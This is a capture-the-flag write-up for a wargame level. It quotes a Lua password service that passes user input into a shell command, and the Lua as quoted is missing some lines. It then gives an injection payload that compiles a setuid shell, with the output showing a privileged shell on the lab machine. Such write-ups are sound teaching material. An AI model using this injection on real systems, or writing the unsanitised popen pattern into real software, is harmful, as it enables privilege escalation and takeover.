In Level12 we are given the following code:

local socket = require("socket")  
local server = assert(socket.bind("", 50001))

function hash(password)  
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")

  data = string.sub(data, 1, 40)

  return data

while 1 do  
  local client = server:accept()
  client:send("Password: ")
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
      client:send("Congrats, your token is 413**CARRIER LOST**\n")



We have a command injection as the password variable can be controlled by the user and it is used to create a command that will be run in the system. All we need to do is inject our commands. In this case, we will be using the shell wrapper shown in level 11:

[email protected]:~$ nc localhost 50001  
Password: 1; gcc -o /tmp/shell /tmp/shell.c; chmod +s /tmp/shell; echo 1  
Better luck next time  
[email protected]:~$ ls -la /tmp  
total 32  
drwxrwxrwt  4 root    root    4096 Nov 24 12:37 .  
drwxr-xr-x 22 root    root    4096 Dec  6  2011 ..  
-rwsr-sr-x  1 flag12  flag12  7241 Nov 24 12:43 shell
-rw-rw-r--  1 level11 level11  180 Nov 24 11:48 shell.c

Now lets run our shell and get the flag:

[email protected]:~$ cd /tmp  
[email protected]:/tmp$ ./shell  
sh-4.2$ id  
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)  
sh-4.2$ getflag  
You have successfully executed getflag on a target account  

Voila !!